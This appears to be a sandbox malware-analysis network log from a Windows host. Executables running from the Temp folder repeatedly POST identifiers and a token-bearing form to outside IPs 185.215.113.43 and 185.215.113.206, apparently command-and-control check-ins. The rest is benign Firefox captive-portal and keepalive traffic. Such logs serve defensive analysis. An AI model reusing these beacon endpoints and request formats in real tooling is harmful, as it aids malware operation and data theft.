Nov 4, 2024 17:33:24.775415897 CET	1236	IN	Data Raw: fc 32 31 ef 8a 6c 28 4b d1 27 6d ca 55 25 f3 ee 8a e5 df 83 37 07 f3 a4 d4 1f b9 eb 37 e1 32 ef c9 eb 7a 84 c9 eb 7a 84 c9 eb 7a 84 c9 74 b9 e2 3e aa 15 bf 3e df b9 08 12 6f 6d ca 81 24 f3 ee 6f 2e 02 f0 8a 64 2c 6e 95 23 f4 e6 c8 31 31 ef 52 e3 Data Ascii: 21l(K'mU%772zzzt>>om$o.d,n#11R.,l92zzztd,H`0F\|pzzztd,F@+g0'$zzzt ?C:FM#i0\|&6-}7.#E\|pzt`0
Nov 4, 2024 17:33:24.775429010 CET	1236	IN	Data Raw: c9 eb 7a 84 c9 eb 7a 84 c9 74 b9 e2 43 aa f1 c2 3f aa a1 c6 3e 6f af 7b d9 07 ee 56 d4 1f b9 7e ce 65 34 ef d5 1f 24 46 cb e6 ec da 06 1f 24 ef 52 e3 32 89 0f 1f bb 77 d4 a9 25 30 92 df a1 f7 29 ee f5 fc 8a ed 0e c2 3f 20 24 12 8b e5 84 45 f0 7c Data Ascii: zztC?>o{V~e4$F$R2w%0)? $E\|pztd,?\|.Wr#$HO`$g@r3K`1Czzztd,L0o $zzzt;P?"ud @Td$DG#r CP4,
Nov 4, 2024 17:33:24.780411959 CET	1120	IN	Data Raw: 14 23 24 ef d5 1f b1 70 19 1f a3 cb 8c 6d e8 e5 0e aa ec 2e 8d 67 30 48 47 5f 6d 09 da 20 24 ef d5 1e a2 de ec 8c 3b ed d5 a2 72 cc 90 df 33 4c a0 1f 24 ef ce 64 28 ef d5 1e 24 4c ba 2e b0 42 d5 1f 24 e7 1f a6 25 ef 8a 0f ba 11 0e aa 74 3b 96 0f Data Ascii: #$pm.g0HG_m $;r3L$d($L.B$%t;4fy3+F"$l76.1\|O:@ Zfykjum!$'Zfy=d($Brd($K4g&o0FHG$x;#$eo0 $Y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50171	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:24.188293934 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:33:25.111326933 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50173	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:26.749952078 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:33:27.661515951 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50176	185.215.113.206	80	2472	C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:29.230134964 CET	474	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHDAFHDHCBFIDGCFIDG Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 2d 2d 0d 0a Data Ascii: ------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IEHDAFHDHCBFIDGCFIDG--
Nov 4, 2024 17:33:30.631685972 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50177	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:29.241240978 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:33:30.171861887 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.5	50185	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:31.221530914 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:33:31.809201956 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59404 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:33:32.071806908 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:33:32.195179939 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59405 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50197	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:31.961314917 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:33:32.837804079 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.5	50199	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:32.073632956 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.5	50202	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:32.219700098 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:33:32.806520939 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1752 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 4, 2024 17:33:32.886838913 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:33:33.012192965 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1752 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 4, 2024 17:33:33.292186022 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:33:33.415064096 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1753 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 4, 2024 17:33:33.828249931 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:33:33.951109886 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1753 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 4, 2024 17:33:34.457977057 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:33:34.581015110 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1754 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 4, 2024 17:33:38.445940018 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:33:38.572897911 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1758 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 4, 2024 17:33:48.612530947 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:33:49.094286919 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:33:49.217808008 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1769 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 4, 2024 17:33:59.311395884 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:33:59.998857021 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:34:00.122409105 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1780 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 4, 2024 17:34:01.076389074 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:34:01.199009895 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1781 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 4, 2024 17:34:01.701432943 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:34:01.824951887 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1781 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 4, 2024 17:34:10.603467941 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:34:10.762890100 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1790 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 4, 2024 17:34:20.803724051 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:34:30.906721115 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:34:31.801152945 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:34:31.924174070 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1811 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 4, 2024 17:34:32.027995110 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:34:32.150357008 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1812 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 4, 2024 17:34:42.217981100 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:34:51.551588058 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:34:51.674350977 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1831 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 4, 2024 17:35:01.713934898 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:35:11.814431906 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:35:21.913115025 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:35:32.014115095 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:35:42.115442038 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:36:12.218059063 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:36:12.341597080 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1912 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.5	50203	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:32.245682955 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:33:32.872257948 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59405 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:33:33.143320084 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:33:33.272799969 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59406 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:33:33.681062937 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:33:33.815190077 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59406 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:33:34.317733049 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:33:34.447581053 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59407 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:33:38.310183048 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
